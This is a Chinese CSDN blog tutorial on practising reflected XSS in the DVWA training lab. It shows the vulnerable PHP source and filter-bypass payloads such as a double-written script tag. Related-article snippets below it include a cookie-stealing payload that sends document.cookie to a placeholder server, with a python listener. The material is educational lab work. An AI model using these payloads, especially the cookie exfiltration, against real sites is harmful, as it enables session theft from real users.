dvwa下xss练手实践

最新推荐文章于 2024-07-09 18:08:01 发布
最新推荐文章于 2024-07-09 18:08:01 发布
阅读量1.2w 收藏 45
点赞数 12
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/h1012946585/article/details/82500018
版权
本文介绍了跨站脚本(XSS)攻击的概念、分类,并通过DVWA(Damn Vulnerable Web Application)实践了反射型和储存型XSS攻击的不同级别。详细探讨了如何绕过过滤机制,包括使用不同注入方法和标签。同时,提供了检测XSS漏洞的一些方法。
摘要由CSDN通过智能技术生成

xss简介:

跨站脚本(英语:Cross-site scripting,通常简称为:XSS)是一种网站应用程序的安全漏洞攻击,是代码注入的一种。它允许恶意用户将代码注入到网页上,其他用户在观看网页时就会受到影响。XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。从而使目标计算机收到危害。

分类:

xss漏洞分为三类,分别是存储和反射。还有第三种不太知名的XSS攻击类型,基于DOM的XSS。

存储的XSS攻击

存储攻击是指注入的脚本永久存储在目标服务器上的攻击,例如在数据库,消息论坛,访问者日志,注释字段等中。受害者在请求存储时从服务器检索恶意脚本。信息。存储的XSS有时也称为持久性或类型 Ⅰ XSS。

反射型的XSS攻击

反射攻击是指注入的脚本从Web服务器反射出来的攻击,例如错误消息,搜索结果或包含作为请求的一部分发送到服务器的部分或全部输入的任何其他响应。反射的攻击通过其他途径传递给受害者,例如在电子邮件中或在其他一些网站上。当用户被欺骗点击恶意链接,提交特制表单,甚至只是浏览恶意网站时,注入的代码会传播到易受攻击的网站,这会将攻击反映回用户的浏览器。然后浏览器执行代码,因为它来自“可信”服务器。反射的XSS有时也称为非持久性或II型XSS。

本文就验证两种xss攻击,因为笔者尚未学习php语言,无法写出实验的网站代码,所以就使用dvwa进行渗透实验。

DVWA网站的安装可以参见以下网站:

https://www.cnblogs.com/amberly/p/6089224.html

在登陆DVWA以及将安全等级调为low等级之后,进行xss

(经笔者实验,在chrome浏览器下不能正常得到攻击后的响应,所以如果要进行实验的话建议使用Firefox等浏览器)

反射型xss:

Low

服务器端核心代码

Low Reflected XSS Source

<?php

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Feedback for end user
    echo '<pre>Hello ' . $_GET[ 'name' ] . '</pre>';
}

?>

观察到并没有对name进行任何的过滤操作。

那么输入<script>alert(123456)</script>

观察到弹窗。

接下来看中级的xss源代码:

Medium Reflected XSS Source

<?php

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Get input
    $name = str_replace( '<script>', '', $_GET[ 'name' ] );

    // Feedback for end user
    echo "<pre>Hello ${name}</pre>";
}

?>

看到有一个 $name = str_replace( '<script>', '', $_GET[ 'name' ] );
这个函数将字符“<script>”换为NULL,那么由于函数只执行一次,有多种方法可以绕过。

比如将这个标签双写绕过,但是只能过滤一次,就达成了我们的目的。

比如:<sc<script>ript>alert(123456)</script>

最低0.47元/天 解锁文章
deep__
关注
  • 12
    点赞
  • 45
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
Dvwa靶机渗透教程-xss反射漏洞
imhacket0day的博客
08-25 1187
Dvwa靶机渗透教程-xss反射漏洞 简单: emmm…很明显…这里用'><script>alert(1)</script>试试 好的,确认有漏洞;接下来讲利用 '<script>window.location.href='http://服务器地址/?cookie='+document.cookie</script> 用这个获取受害者cookie并发回服务器 使用python2搭建简单web服务器: python2 -m SimpleHTTPServ
基于DVWA实现XSS跨站脚本漏洞-反射、存储、DOM XSS
weixin_44029504的博客
05-08 1178
什么是XSS跨站脚本漏洞 XSS跨站脚本(Cross-Site Scripting,XSSXSS最大的特点就是能注入恶意的HTML/JavaScript代码到用户浏览的网页上,是因WEB应用程序对用户输入过滤不足而产生的,当用户浏览这些网页时,就会执行其中的恶意代码。由于HTML代码和客户端JavaScript脚本能在受害者主机上的浏览器任意执行,这样等同于完全控制了WEB客户端的逻辑,在这个...
DVWA练习——XSS
haoaaao的博客
01-22 418
一、xss(reflected) (1)难度:low 提交代码 (2)难度:medium a、查看源代码,发现将<script>标签替换置空 b、发现将某个东西替换成空,首先想到“双写绕过”的办法 /****双写绕过eg:构造<sc<script>ript>,当<script>被过滤掉时,剩下的字符自动拼接在一起,就形成了<script> ****/ (3)、难度:high 查看源码,发现对多个...
【网络安全的神秘世界】XSS基本概念和原理介绍
最新发布
weixin_54750312的博客
07-09 999
恶意攻击者往web页面插入恶意代码脚本(JS代码),当用户浏览该页面时,嵌入web里面的JS代码会被执行,从而达到恶意攻击用户的目的。也叫持久,常见的就是在博客留言版、反馈投诉、论坛评论等位置,将恶意代码和正文都存入服务端,每次访问都会触发恶意代码。我们可以构造恶意代码,观察远程服务器web日志,只要网站管理员访问,它的cookie值就被盗取。发现恶意代码被浏览器保存到页面了,访问其他网页再回来,仍会造成攻击,这就叫持久。像刚才的攻击流程,攻击一次立马失效,这就叫非持久
DVWA XSS攻击示例
jpygx123的博客
10-11 642
反射XSS: **Low等级:**任何XSS方法都可以用 **中等级:**过滤 &lt;script &gt;alert('123')&lt;/script&gt; &lt;sCript&gt;alert('123')&lt;/script&gt; &lt;scri&lt;script&gt;pt&gt;alert('123')&lt;/script&gt; &a
DVWA-xss-impossible
王嘟嘟的博客
09-17 2335
0x00 前言 在网上没有看到对impossible xss进行绕过的,impossible的含义也是没有xss的意思,或者是还没有人发现这个impossible绕过方式,我们还是跟风,直接看一下代码。 0x01 学习 1.源码 这里使用了一个htmlspecialchars方法,这个方法在php里的意思就是把字符转换为实体,这样子的实体是没有办法进行注入的。 暂时我也不知道...
DVWA下的XSS
07-25
### DVWA下的XSS #### 一、XSS概述 XSS(Cross-Site Scripting,跨站脚本攻击)是一种常见的网络安全攻击方式,通过在合法网页中注入恶意脚本,当用户浏览这些网页时,恶意脚本会在用户的浏览器中执行,从而实现...
DVWA(练手靶场).zip
09-01
6. **跨站请求伪造(CSRF)**:DVWA的CSRF漏洞展示了如何在用户不知情的情况下,利用他们的浏览器发起恶意请求。防止CSRF的方法包括使用CSRF令牌、限制敏感操作的HTTP方法(如仅限POST),以及检查请求的来源。 7. **...
xss-dvwa靶场详情
04-06
dvwa靶场中的xss漏洞详情
dvwa靶场,里面也有xss靶场
09-24
DVWA中的XSS靶场通常包含反射XSS、存储XSS和DOMXSS三个部分,每个部分都有不同级别的难度,让用户逐步理解XSS的原理和防御方法。 2. **数据库连接配置** 在DVWA中,数据库连接信息位于`DVWA-master\config`...
DVWAxss
giun的博客
03-11 996
一、反射(reflected) (一)、尝试low等级 输入正常数字,返回以下内容 再输入&amp;lt;xss&amp;gt;发现,只输出了hello 我们使用火狐的开发者工具查看下元素 发现hello的后面是一对xss标签 我们进行弹窗测试 输入&amp;lt;script&amp;gt;alert(/xss/)&amp;lt;/script&amp;gt; 发现弹窗,说明存在xss注入 介绍javaScript的3个弹
DVWAXSS
weixin_34284188的博客
05-03 74
2019独角兽企业重金招聘Python工程师标准>>> ...
DVWA——XSS(Reflected)——多种方法实现+详细步骤图解+获取cookie的利用过程演示
热门推荐
weixin_46709219的博客
01-25 1万+
一)XSS(Reflected)介绍: 反射xss(非持久):需要欺骗用户自己去点击链接才能触发XSS代码(服务器中没有这样的页面和内容),一般容易出现在搜索页面。特点:弹窗警告、广告;javascript;在浏览器中执行。 通过Web站点漏洞,向客户交付恶意脚本代码,实现对客户端的攻击;恶意攻击者往Web页面里插入恶意的 Script 代码,当用户浏览该页面时,嵌入其中 Web 里面的 Script 代码就会被执行,从而达到恶意攻击用户的目的;注入客户端脚本代码、盗取cookie、重定向等。 二)实际
dvwaxss(部分内容转自大佬)
crowsec
05-02 495
XSSXSS,全称Cross Site Scripting,即跨站脚本攻击,某种意义上也是一种注入攻击,是指攻击者在页面中注入恶意的脚本代码,当受害者访问该页面时,恶意代码会在其浏览器上执行,需要强调的是,XSS不仅仅限于JavaScript,还包括flash等其它脚本语言。根据恶意代码是否存储在服务器中,XSS可以分为存储XSS与反射XSS。DOMXSS由于其特殊性,常常被分为第三种...
DVWA靶场的XSS详解
Reset
05-11 888
目录 反射 low medium high impossible 存储 low medium high impossible DOM low medium high impossible 反射 low 服务器代码: <?php header ("X-XSS-Protection: 0"); // Is there any input? if( array_key_exists( "name", $_GET ) && $_GET..
XSS练习小游戏
weixin_30906671的博客
04-15 221
在线地址:http://test.xss.tv/ 实验环境也可以本地搭建,不过需要php+mysql的环境 源码:https://files.cnblogs.com/files/Eleven-Liu/xss%E7%BB%83%E4%B9%A0%E5%B0%8F%E6%B8%B8%E6%88%8F.zip 我选择使用本地环境搭建,这样好进行源码分析 level1 <?php ...
ctf xss利用_【CTF】某xss练手小游戏
weixin_31188325的博客
01-14 280
http://test.xss.tv1、http://47.94.13.75/test/level1.php?name=test直接插入即可,如:http://47.94.13.75/test/level1.php?name=alert(1)2、http://47.94.13.75/test/level2.php?keyword=test文本框中输入,闭合一下即可,如:http://47.94.1...
DVWA-xss详细讲解
qq_43395215的博客
05-08 1309
XSS,全称跨站脚本,即跨站脚本攻击,某种意义上也是一种注入攻击,是指攻击者在页面中注入恶意的脚本代码,当受害者访问该页面时,恶意代码会在其浏览器上执行,需要修改的是,XSS不仅仅扩展JavaScript,还包括flash等其他脚本语言。根据恶意代码是否存储在服务器中,XSS可以分为存储XSS与反射XSS。 博客地址:http://soliym.top/ XSS分类: 反射xss:只是简...
dvwa靶场xss攻击
09-25
DVWA靶场中,有一个特定的漏洞被称为XSS(跨站脚本攻击)。XSS攻击是一种利用网页应用程序对用户输入的处理不当而进行的攻击。通过在受害者浏览器中执行恶意脚本,攻击者可以窃取用户的敏感信息、劫持用户会话或者...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值